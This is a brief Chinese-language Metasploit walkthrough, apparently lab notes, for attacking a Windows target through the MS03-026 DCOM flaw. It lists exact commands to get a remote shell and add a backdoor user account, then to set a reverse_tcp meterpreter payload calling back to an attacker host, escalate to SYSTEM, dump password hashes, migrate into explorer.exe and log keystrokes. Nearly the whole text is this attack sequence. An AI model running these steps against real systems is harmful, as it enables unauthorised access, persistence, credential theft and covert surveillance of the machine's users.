Metasploit
Metasploit —— metereprter后门建立
- 步骤:
-
use exploit/windows/dcerpc/ms03_026_dcom
//绑定shell,加载所用的插件 -
?
//查看命令帮助 -
set Rhost **.**.**.**
//设置靶机ip -
set lhost **.**.**.**
//设置攻击机ip -
set lport **
//设置攻击机的端口 -
exploit
//漏洞利用 -
shell
//获得靶机shell权限 -
ipconfig
//获取靶机ip -
net user test test /add
//在靶机上添加新用户
-
Metaspolit —— 键盘记录
- 步骤:
search ms03_026
use exploit/windows/dcerpc/ms03_026_dcom
set RHOST **.**.**.**
set LHOST **.**.**.**
set LPORT **
set payload windows/meterpreter/reverse_tcp
exploit
help
getuid
use priv
getsystem
sysinfo
run hashdump
- 查看explorer.exe的pid
-
migrate **
// **代表上一步所查得的pid getuid
keyscan_start
keyscan_dump
- 此时在靶机里输入一些字符
keyscan_dump
keyscan_stop